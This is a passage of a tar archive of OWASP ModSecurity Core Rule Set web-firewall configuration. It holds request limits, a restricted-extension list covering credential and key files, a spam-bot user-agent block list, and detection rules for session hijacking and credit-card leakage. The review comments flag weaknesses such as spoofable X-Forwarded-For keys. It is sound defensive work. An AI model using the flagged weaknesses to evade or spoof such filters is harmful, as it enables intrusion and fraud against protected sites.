# variable left unset here are not effective until the matching SecAction is
# uncommented. Confirm in that file before relying on any of the limits below.
#
#
# -- Maximum number of arguments in request limited
SecAction \
  "id:'900006', \
  phase:1, \
  t:none, \
  setvar:tx.max_num_args=255, \
  nolog, \
  pass"

#
# -- Limit argument name length
#SecAction \
  "id:'900007', \
  phase:1, \
  t:none, \
  setvar:tx.arg_name_length=100, \
  nolog, \
  pass"

#
# -- Limit argument value length
#SecAction \
  "id:'900008', \
  phase:1, \
  t:none, \
  setvar:tx.arg_length=400, \
  nolog, \
  pass"

#
# -- Limit arguments total length
#SecAction \
  "id:'900009', \
  phase:1, \
  t:none, \
  setvar:tx.total_arg_length=64000, \
  nolog, \
  pass"

#
# -- Individual file size is limited
#SecAction \
  "id:'900010', \
  phase:1, \
  t:none, \
  setvar:tx.max_file_size=1048576, \
  nolog, \
  pass"

#
# -- Combined file size is limited
#SecAction \
  "id:'900011', \
  phase:1, \
  t:none, \
  setvar:tx.combined_file_sizes=1048576, \
  nolog, \
  pass"

#
# Set the following policy settings here and they will be propagated to the 30 rules
# file (modsecurity_crs_30_http_policy.conf) by using macro expansion.
# If you run into false positives, you can adjust the settings here.
#
# Rule 900012 stores the HTTP policy lists (methods, request content types,
# protocol versions, restricted file extensions, restricted headers) in TX
# variables.
#
# NOTE(review): application/xml and application/json are allowed content types
# here, but the XML body-processor rule later in this file (900017) only
# matches a Content-Type containing "text/xml". Check that your main
# ModSecurity configuration selects a suitable request body processor for every
# structured content type you allow, otherwise those bodies may not be parsed
# into the variables the attack rules inspect.
#
SecAction \
  "id:'900012', \
  phase:1, \
  t:none, \
  setvar:'tx.allowed_methods=GET HEAD POST OPTIONS', \
  setvar:'tx.allowed_request_content_type=application/x-www-form-urlencoded|multipart/form-data|text/xml|application/xml|application/x-amf|application/json', \
  setvar:'tx.allowed_http_versions=HTTP/0.9 HTTP/1.0 HTTP/1.1', \
  setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/', \
  setvar:'tx.restricted_headers=/Proxy-Connection/ /Lock-Token/ /Content-Range/ /Translate/ /via/ /if/', \
  nolog, \
  pass"

#
# -- [[ Content Security Policy (CSP) Settings ]] -----------------------------------------
#
# The purpose of these settings is to send CSP response headers to
# Mozilla FireFox users so that you can enforce how dynamic content
# is used. CSP usage helps to prevent XSS attacks against your users.
#
# Reference Link:
#
#	https://developer.mozilla.org/en/Security/CSP
#
# Uncomment this SecAction line if you want to use CSP enforcement.
# You need to set the appropriate directives and settings for your site/domain
# and activate the CSP file in the experimental_rules directory.
#
# Ref: http://blog.spiderlabs.com/2011/04/modsecurity-advanced-topic-of-the-week-integrating-content-security-policy-csp.html
#
# NOTE(review): "allow" is the directive name from the early Mozilla CSP draft;
# the standardised equivalent is "default-src". tx.csp_report_only=1 presumably
# makes the experimental CSP rules send a report-only header, which reports
# violations but does not stop them. Confirm in that rules file.
#
#SecAction \
  "id:'900013', \
  phase:1, \
  t:none, \
  setvar:tx.csp_report_only=1, \
  setvar:tx.csp_report_uri=/csp_violation_report, \
  setenv:'csp_policy=allow \'self\'; img-src *.yoursite.com; media-src *.yoursite.com; style-src *.yoursite.com; frame-ancestors *.yoursite.com; script-src *.yoursite.com; report-uri %{tx.csp_report_uri}', \
  nolog, \
  pass"

#
# -- [[ Brute Force Protection ]] ---------------------------------------------------------
#
# If you are using the Brute Force Protection rule set, then uncomment the following
# lines and set the following variables:
# - Protected URLs: resources to protect (e.g. login pages) - set to your login page
# - Burst Time Slice Interval: time interval window to monitor for bursts
# - Request Threshold: request # threshold to trigger a burst
# - Block Period: temporary block timeout
#
# NOTE(review): the counters for this and the DoS rule set below presumably
# live in the IP collection that rules 900020/900021 at the end of this file
# initialise. That collection's key is built from X-Forwarded-For (when
# present) and the User-Agent hash, both of which the client controls unless a
# trusted proxy overwrites them. Confirm how the key is derived in your
# deployment before relying on these thresholds.
#
#SecAction \
  "id:'900014', \
  phase:1, \
  t:none, \
  setvar:'tx.brute_force_protected_urls=#/login.jsp# #/partner_login.php#', \
  setvar:'tx.brute_force_burst_time_slice=60', \
  setvar:'tx.brute_force_counter_threshold=10', \
  setvar:'tx.brute_force_block_timeout=300', \
  nolog, \
  pass"

#
# -- [[ DoS Protection ]] ----------------------------------------------------------------
#
# If you are using the DoS Protection rule set, then uncomment the following
# lines and set the following variables:
# - Burst Time Slice Interval: time interval window to monitor for bursts
# - Request Threshold: request # threshold to trigger a burst
# - Block Period: temporary block timeout
#
#SecAction \
  "id:'900015', \
  phase:1, \
  t:none, \
  setvar:'tx.dos_burst_time_slice=60', \
  setvar:'tx.dos_counter_threshold=100', \
  setvar:'tx.dos_block_timeout=600', \
  nolog, \
  pass"

#
# -- [[ Check UTF encoding ]] -----------------------------------------------------------
#
# We only want to apply this check if UTF-8 encoding is actually used by the
# site, otherwise
# it will result in false positives.
#
# Uncomment this line if your site uses UTF8 encoding
#SecAction \
  "id:'900016', \
  phase:1, \
  t:none, \
  setvar:tx.crs_validate_utf8_encoding=1, \
  nolog, \
  pass"

#
# -- [[ Enable XML Body Parsing ]] -------------------------------------------------------
#
# The rules in this file will trigger the XML parser upon an XML request
#
# Initiate XML Processor in case of xml content-type
#
# NOTE(review): the pattern is the unanchored string "text/xml" (matched after
# lowercasing), so a Content-Type of application/xml, although allowed by rule
# 900012, does not switch the body processor here. The chained rule only sets
# the processor when it is not already XML.
#
SecRule REQUEST_HEADERS:Content-Type "text/xml" \
  "id:'900017', \
  phase:1, \
  t:none,t:lowercase, \
  nolog, \
  pass, \
  chain"
	SecRule REQBODY_PROCESSOR "!@streq XML" \
	  "ctl:requestBodyProcessor=XML"

#
# -- [[ Global and IP Collections ]] -----------------------------------------------------
#
# Create both Global and IP collections for rules to use
# There are some CRS rules that assume that these two collections
# have already been initiated.
#
# Rule 900018 stores the hex-encoded SHA-1 of the User-Agent header in
# tx.ua_hash. NOTE(review): when the request has no User-Agent header the rule
# has nothing to match, so tx.ua_hash presumably stays unset and the collection
# key built below ends in an empty suffix. Confirm.
#
SecRule REQUEST_HEADERS:User-Agent "^(.*)$" \
  "id:'900018', \
  phase:1, \
  t:none,t:sha1,t:hexEncode, \
  setvar:tx.ua_hash=%{matched_var}, \
  nolog, \
  pass"

#
# Rule 900019 copies the first dotted-quad at the start of X-Forwarded-For into
# tx.real_ip.
#
# NOTE: X-Forwarded-For is a request header. Unless a proxy you control sets
# or overwrites it, its value is chosen by the client, and tx.real_ip then keys
# the persistent IP collection (rule 900020) instead of REMOTE_ADDR. Per-client
# state such as brute-force or DoS counters can then be split across made-up
# addresses or attributed to someone else's address. If no trusted proxy is in
# front of this server, disable rule 900019; if one is, consider accepting the
# header only when REMOTE_ADDR is that proxy. The pattern matches IPv4 only.
#
SecRule REQUEST_HEADERS:x-forwarded-for "^\b(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\b" \
  "id:'900019', \
  phase:1, \
  t:none, \
  capture, \
  setvar:tx.real_ip=%{tx.1}, \
  nolog, \
  pass"

# Rule 900020: tx.real_ip was set from X-Forwarded-For, so the IP collection is
# keyed on that value plus the User-Agent hash.
SecRule &TX:REAL_IP "!@eq 0" \
  "id:'900020', \
  phase:1, \
  t:none, \
  initcol:global=global, \
  initcol:ip=%{tx.real_ip}_%{tx.ua_hash}, \
  nolog, \
  pass"

# Rule 900021: no tx.real_ip, so fall back to REMOTE_ADDR for both the
# collection key and tx.real_ip.
SecRule &TX:REAL_IP "@eq 0" \
  "id:'900021', \
  phase:1, \
  t:none, \
  initcol:global=global, \
  initcol:ip=%{remote_addr}_%{tx.ua_hash}, \
  setvar:tx.real_ip=%{remote_addr}, \
  nolog, \
  pass"
����������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/��������������������������������������������0000775�0000000�0000000�00000000000�12164572564�0023563�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_42_comment_spam.data������������0000664�0000000�0000000�00000000750�12164572564�0032036�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������super happy fun psycheclone grub crawler core-project/ winnie poh mozilla/4.0+( email siphon internet explorer nutscrape/ mozilla/4.0( missigua libwww-perl movable type user blogsearchbot-martin emailsiphon digger 8484 boston project nutchcvs pycurl java 1. isc systems irc emailcollector mj12bot/v1.0.8 trackback/ microsoft url diamond autoemailspider lwp pussycat jakarta commons java/1. 
user-agent: <sc adwords omniexplorer wordpress httpproxy user agent: ecollector msie cherrypicker ������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_10_ignore_static.conf�������0000664�0000000�0000000�00000004362�12164572564�0033067�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # The rules in this file will cause ModSecurity to let requests for static # content go into the server without being examined (mostly media content). # This can reduce the load on the server considerably. # # This ruleset will skip all tests for media files, but will skip only the # request body phase (phase 2) for text files. To skip the outbound stage # for text files, add file 47 (skip_outbound_checks) to your configuration, # in addition to this file # # NOTE If you are using mod_rewrite to rewrite URLs, please keep in mind # that some URLs may seem static, when they are not. for example, # if you have a rule like this in your configuration: # RewriteRule (.*).gif images.php?id=$1 [QSA] # then requests to the gif files will pass through ModSecurity without # inspection. 
# # We skip inspection GET & HEAD requests that have no parameters # and that end with static content file extension SecRule REQUEST_METHOD "^(?:GET|HEAD)$" "chain,phase:2,t:none,skip:1,pass,nolog,id:'900040',severity:'6'" SecRule &ARGS "@eq 0" "t:none,setvar:tx.no_parameters=1" SecAction "phase:2,id:'900041',t:none,nolog,pass,skipAfter:END_STATIC_CONTENT_CHECK" # Determine actions based on static file extensions # Images SecRule REQUEST_FILENAME "\.(?:(?:jpe?|pn)g|gif|ico)$" "phase:2,t:none,t:lowercase,allow,nolog,id:'900042',severity:'6'" # Documents SecRule REQUEST_FILENAME "\.(?:doc|pdf|txt|xls)$" "phase:2,t:none,t:lowercase,setvar:tx.text_file_extension=1,allow:phase,nolog,id:'900043',severity:'6'" # HTML SecRule REQUEST_FILENAME "\.(?:(?:cs|j)s|html?)$" "phase:2,t:none,t:lowercase,setvar:tx.text_file_extension=1,allow:phase,nolog,id:'999005',severity:'6'" # Media files SecRule REQUEST_FILENAME "\.(?:mp(?:e?g|3)|avi|flv|swf|wma)$" "phase:2,t:none,t:lowercase,allow,nolog,id:'999006',severity:'6'" SecMarker END_STATIC_CONTENT_CHECK ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_11_avs_traffic.conf���������0000664�0000000�0000000�00000002632�12164572564�0032523�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. 
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.
# ---------------------------------------------------------------

#
# This ruleset allows you to control how ModSecurity will handle traffic originating
# from Authorized Vulnerability Scanning (AVS) sources.
# See related blog post -
# http://blog.spiderlabs.com/2010/12/advanced-topic-of-the-week-handling-authorized-scanning-traffic.html
#
# NOTE: both templates below key on REMOTE_ADDR. Behind a reverse proxy or load
# balancer that is the proxy's address, so an exemption written for a scanner
# would then apply to every client reaching the server through that proxy.
# Keep the matched address or range as narrow as the scanner actually needs.
#

#
# White-list ASV network block (no blocking or logging of AVS traffic)
# Update IP network block as appropriate for your AVS traffic
# NOTE(review): the action list names two disruptive actions, "pass" and
# "allow"; presumably the later one ("allow") is the one that takes effect.
# Confirm before enabling. With "allow" and "nolog", traffic from the whole
# matched range is neither inspected further nor recorded.
#SecRule REMOTE_ADDR "@beginsWith 192.168.1." "phase:1,id:'981033',t:none,nolog,pass,allow"

#
# Recommended "Block but Don't Log" rule for scanning traffic
# Update IP address/network block as appropriate for your ASV traffic
# This turns the audit engine off for the matching address for the rest of the
# transaction, unless a later rule turns it back on.
#SecRule REMOTE_ADDR "@streq 192.168.1.101" "phase:1,id:'981034',t:none,nolog,pass,ctl:auditEngine=Off"

# Recommended phase 3 rule that will re-enable the audit engine if the request
# was not blocked by one of the normal rules.
# Update IP address/network block as appropriate for your ASV traffic #SecRule REMOTE_ADDR "@streq 192.168.1.101" "phase:3,id:'981035',t:none,nolog,pass,ctl:auditEngine=On" ������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_13_xml_enabler.conf���������0000664�0000000�0000000�00000001213�12164572564�0032520�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# --------------------------------------------------------------- # The rules in this file will trigger the XML parser upon an XML request # Initiate XML Processor in case of xml content-type SecRule REQUEST_HEADERS:Content-Type "text/xml" \ "phase:1,id:'981053',t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_16_authentication_tracking.conf�����������������������������������������������������0000664�0000000�0000000�00000004104�12164572564�0035057�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules����������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Create an audit log of a successful Authentication. # # We also set the username in the Session and User collections. This allows # for showing the UserID associated with the SESSIONID in any alerts generated. # # Must review the ModSecurity audit log data to review what a successful auth attempt # looks like and then customize this template ruleset for it. 
# #SecRule REQUEST_FILENAME "@streq /path/to/login.jsp" "chain,phase:3,t:none,pass,nolog,auditlog,msg:'Successful Authentication Attempt.',logdata:'Username - %{args.userid}'" # SecRule REQUEST_METHOD "@streq POST" "chain,t:none" # SecRule ARGS:event "@streq LOGON" "chain,t:none" # SecRule RESPONSE_STATUS "@streq 302" "chain,t:none" # SecRule RESPONSE_HEADERS:Location "@streq http://www.example.com/path/to/login.jsp?event=WELCOME" "chain,t:none" # SecRule ARGS:userid ".*" "t:none,setvar:session.username=%{args.userid},setuid:%{args.userid},setvar:session.successful_auth=1" # # Create an alert when a user fails authenticating. # # Must review the ModSecurity audit log data to review what a failed auth attempt # looks like and then customize this template ruleset for it. # #SecRule REQUEST_FILENAME "@streq /path/to/login.jsp" "chain,phase:3,t:none,pass,log,severity:'2',msg:'Failed Authentication Attempt.',logdata:'Username - %{args.userid}'" # SecRule REQUEST_METHOD "@streq POST" "chain,t:none" # SecRule ARGS:event "@streq LOGON" "chain,t:none" # SecRule RESPONSE_STATUS "@streq 302" "chain,t:none" # SecRule RESPONSE_HEADERS:Location "@streq http://www.example.com/path/to/login.jsp?event=ERROR&ErrorDesc=Invalid User ID/Password Please try again." 
"t:none" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_16_session_hijacking.conf���0000664�0000000�0000000�00000007355�12164572564�0033742�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This rule file will identify outbound Set-Cookie/Set-Cookie2 response headers and # then initiate the proper ModSecurity session persistent collection (setsid). # The rules in this file are required if you plan to run other checks such as # Session Hijacking, Missing HTTPOnly flag, etc... # # # This rule set will identify subsequent SessionIDs being submitted by clients in # Request Headers. 
First we check that the SessionID submitted is a valid one # SecMarker BEGIN_SESSION_STARTUP SecRule REQUEST_COOKIES:'/(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid)/' ".*" "chain,phase:1,id:'981054',t:none,block,log,msg:'Invalid SessionID Submitted.',setsid:%{matched_var},setvar:tx.sessionid=%{matched_var},skipAfter:END_SESSION_STARTUP" SecRule SESSION:IS_NEW "@eq 1" "t:none,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/INVALID_SESSIONID-%{matched_var_name}=%{tx.0}" SecRule &REQUEST_COOKIES:'/(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid)/' "@eq 0" "phase:1,id:'981055',t:none,nolog,pass,skipAfter:END_SESSION_STARTUP" SecAction "phase:1,id:'981056',t:none,nolog,pass,setuid:%{session.username},setvar:session.sessionid=%{tx.sessionid}" SecRule REMOTE_ADDR "^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)" "chain,phase:1,id:'981057',capture,t:none,nolog,pass" SecRule TX:1 ".*" "t:sha1,t:hexEncode,setvar:tx.ip_hash=%{matched_var}" SecRule REQUEST_HEADERS:User-Agent ".*" "phase:1,id:'981058',t:none,t:sha1,t:hexEncode,nolog,pass,setvar:tx.ua_hash=%{matched_var}" SecRule TX:IP_HASH "!@streq %{SESSION.IP_HASH}" "phase:1,id:'981059',t:none,block,setvar:tx.sticky_session_anomaly=+1,msg:'Warning - Sticky SessionID Data Changed - IP Address Mismatch.',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SESSION_HIJACK-%{matched_var_name}=%{tx.0}" SecRule TX:UA_HASH "!@streq %{SESSION.UA_HASH}" "phase:1,id:'981060',t:none,block,setvar:tx.sticky_session_anomaly=+1,msg:'Warning - Sticky SessionID Data Changed - User-Agent Mismatch.',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SESSION_HIJACK-%{matched_var_name}=%{tx.0}" SecRule TX:STICKY_SESSION_ANOMALY "@eq 2" "phase:1,id:'981061',t:none,block,msg:'Possible Session Hijacking - IP Address and User-Agent 
Mismatch.',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SESSION_HIJACK-%{matched_var_name}=%{tx.0}" SecMarker END_SESSION_STARTUP # # This rule will identify the outbound Set-Cookie SessionID data and capture it in a setsid # SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "(?i:(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid).*?=([^\s].*?)\;\s?)" "chain,phase:3,id:'981062',t:none,pass,nolog,capture,setsid:%{TX.6},setvar:session.sessionid=%{TX.6},setvar:tx.ip=%{remote_addr},setvar:tx.ua=%{request_headers.user-agent}" SecRule UNIQUE_ID "(.*)" "t:none,t:sha1,t:hexEncode,capture,setvar:session.csrf_token=%{TX.1}" SecRule REMOTE_ADDR "^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)" "chain,phase:3,id:'981063',capture,t:none,nolog,pass" SecRule TX:1 ".*" "t:sha1,t:hexEncode,setvar:session.ip_hash=%{matched_var}" SecRule REQUEST_HEADERS:User-Agent ".*" "phase:3,id:'981064',t:none,t:sha1,t:hexEncode,nolog,pass,setvar:session.ua_hash=%{matched_var}" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_16_username_tracking.conf���0000664�0000000�0000000�00000003055�12164572564�0033742�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. 
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.
# ---------------------------------------------------------------

#
# Template rules for login/audit rules.
# Uncomment the following lines and specify the path or specific login resource for protection
#
#<LocationMatch "^/(?:(admin|account\/login\.jsp$))">

#
# Identify/Set the UserID name and collection
# Must correctly specify the parameter name that holds the username data (example ARGS:username)
#
# NOTE(review): this runs in phase 2 on the submitted parameter, i.e. before
# the application has checked the credentials. session.username and the user
# collection therefore hold the name the client claimed, not an authenticated
# identity.
#
#SecRule ARGS:username ".*" "phase:2,id:'981075',t:none,pass,nolog,noauditlog,capture,setvar:session.username=%{TX.0},setuid:%{TX.0}"

#
# Password Complexity Check
# Must correctly specify the parameter name that holds the password data (example ARGS:password)
# The regex below requires 8 length, one upper, one lower, and one number.
#
# NOTE(review): as written the rule fires when the value MATCHES the pattern,
# i.e. when the password satisfies the requirements, and the message text
# ("does meet") agrees with that. If the intent is to flag weak passwords, the
# operator needs to be negated and the message reworded. Confirm the intent
# before enabling.
# NOTE(review): the pattern only accepts [a-zA-Z0-9], so a password containing
# punctuation never matches it.
# NOTE(review): the last setvar copies %{matched_var}, the password itself,
# into a TX variable. Make sure no later rule writes that variable to a log.
#
#SecRule ARGS:password "^(?=[a-zA-Z0-9]*?[A-Z])(?=[a-zA-Z0-9]*?[a-z])(?=[a-zA-Z0-9]*?[0-9])[a-zA-Z0-9]{8,}$" "phase:2,id:'981076',t:none,block,log,msg:'Password does meet complexity requirements.',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}-POLICY-%{matched_var_name}=%{matched_var}"

#
# Sanitize the user's password data in the audit logs
# Set the appropriate password parameter name
# Enable this whenever audit logging may include request parameters for the
# login resource, so that the password value is masked in the audit log.
#SecAction "phase:5,id:'981077',t:none,pass,nolog,sanitiseArg:password"

#</LocationMatch>
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_25_cc_known.conf������������0000664�0000000�0000000�00000021706�12164572564�0032045�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# ---------------------------------------------------------------

# Detect CC# in input, log transaction and sanitize
#
# Prequalifier: 981078 looks for any number with the generic card layout that
# also passes @verifyCC. On a match, skip:1 jumps over 981079 so the per-brand
# rules below run; otherwise 981079 jumps to END_KNOWN_CC_INBOUND_CHECK.
#
# All inbound brand rules use "pass": they log and sanitise the matched
# argument in the audit log (sanitiseMatched) but neither block the request
# nor add to the anomaly score.
#
# NOTE(review): every pattern accepts only an optional hyphen ("\-?") between
# digit groups, so card numbers written with spaces between the groups are
# not matched by these rules.
SecRule ARGS "@verifyCC (?:^|[^\d])(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})(?:[^\d]|$)" \
        "phase:2,id:'981078',t:none,pass,nolog,skip:1"
SecAction "phase:2,id:'981079',t:none,pass,nolog,skipAfter:END_KNOWN_CC_INBOUND_CHECK"

# GSA SmartPay
SecRule ARGS "@verifyCC (?:^|[^\d])((?:5568|4(?:486|716))\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4}|8699\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \
        "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'GSA SmartPay Credit Card Number detected in user input',id:'920019',tag:'PCI/10.2',severity:'5'"

# MasterCard
# NOTE(review): 5[1-5] covers only the 51-55 prefixes; MasterCard numbers in
# the 2221-2720 range are not matched by this pattern.
SecRule ARGS "@verifyCC (?:^|[^\d])(5[1-5]\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4})(?:[^\d]|$)" \
        "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'MasterCard Credit Card Number detected in user input',id:'920005',tag:'PCI/10.2',severity:'5'"

# Visa
SecRule ARGS "@verifyCC (?:^|[^\d])(4\d{3}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d(?:\d{3})??)(?:[^\d]|$)" \
        "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'Visa Credit Card Number detected in user input',id:'920007',tag:'PCI/10.2',severity:'5'"

# American Express
SecRule ARGS "@verifyCC (?:^|[^\d])(3[47]\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \
        "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'American Express Credit Card Number detected in user input',id:'920009',tag:'PCI/10.2',severity:'5'"

# Diners Club
SecRule ARGS "@verifyCC (?:^|[^\d])((?:30[0-5]|3[68]\d)\d\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{2})(?:[^\d]|$)" \
        "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'Diners Club Credit Card Number detected in user input',id:'920011',tag:'PCI/10.2',severity:'5'"

# enRoute
# (Disabled. Unlike the active rules, this one has no @verifyCC operator, so
# if re-enabled as written it would be a plain regex match - review first.)
#SecRule ARGS "(?:^|[^\d])(2(?:014|149)\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{2}|55\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \
#        "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'enRoute Credit Card Number detected in user input',id:'920013',tag:'PCI/10.2',severity:'5'"

# Discover
SecRule ARGS "@verifyCC (?:^|[^\d])(6(?:011|5\d{2})\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4})(?:[^\d]|$)" \ "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'Discover Credit Card Number detected in user input',id:'920015',tag:'PCI/10.2',severity:'5'" # JCB SecRule ARGS "@verifyCC (?:^|[^\d])(3\d{3}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4}|(?:1800|21(?:31|00))\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'JCB Credit Card Number detected in user input',id:'920017',tag:'PCI/10.2',severity:'5'" SecMarker END_KNOWN_CC_INBOUND_CHECK # Detect CC# in output and block transaction SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})(?:[^\d]|$)" \ "phase:4,id:'981080',t:none,pass,nolog,skip:1" SecAction "phase:4,id:'981081',t:none,pass,nolog,skipAfter:END_KNOWN_CC_OUTBOUND_CHECK" # GSA SmartPay SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)((?:5568|4(?:486|716))\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4}|8699\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'GSA SmartPay Card Number sent from site to user',id:'920020',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # MasterCard SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC 